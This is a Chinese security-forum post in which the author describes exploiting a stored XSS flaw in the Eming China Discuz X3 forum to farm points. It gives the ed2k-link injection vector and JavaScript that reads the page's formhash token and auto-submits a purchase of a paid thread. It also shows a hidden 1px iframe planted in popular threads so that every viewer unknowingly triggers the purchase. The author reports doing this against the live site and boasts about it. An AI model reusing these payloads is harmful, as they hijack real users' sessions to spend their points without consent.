易名中国论坛XSS漏洞可无限刷玉米 - 网站安全

易名中国论坛XSS 漏洞 可无限刷玉米

易名 论坛 DISCUZ X3程序，前段时间论坛爆出XSS漏洞，今天正好逛论坛就试了下，然后有了下面的刷玉米（积分）。 随便找个帖子回复，然后插入连接，为了方便后面的刷分 尽量找回复N多页的帖子，插入代码 ed2k://|file|test|'+document.write(String.fromCharCode())+'|test/

这里我插入的是自动购买主题的JS代码：  

var vzhi =document.getElementsByName("formhash")[0].value; document.write('<form id=payform name=payform method=post autocomplete=off action=forum.php?mod=misc&action=pay&paysubmit=yes&infloat=yes><br>') document.write('<input type=hidden name=formhash value='+vzhi+'><br>') document.write('<input type=hidden name=referer value=http://www.dnbbs.com/./ ><br>') document.write('<input type=hidden name=tid value=869290><br>') /*document.write('<input type=submit name=submit value='+vzhi+'>')*/ document.write('</form><br>') setTimeout("document.payform.submit()",1000)

这样浏览这个帖子就会自动购买主题ID为869290的主题（主题设置收费）， 然后选择热门帖子跟帖 插入另外一个 代码：  

document.writeln("<iframe src=\"第一次回复帖子地址\" frameborder=\"0\" scrolling=\"No\" height=\"1px\" width=\"1px\"></iframe>");

然后不知不觉中主题被不断购买。。。

刚刚刷了几千分就被封了。。管理效率挺高的，赞一个。。没啥恶意啊。。。

查看更多关于易名中国论坛XSS漏洞可无限刷玉米 - 网站安全的详细内容...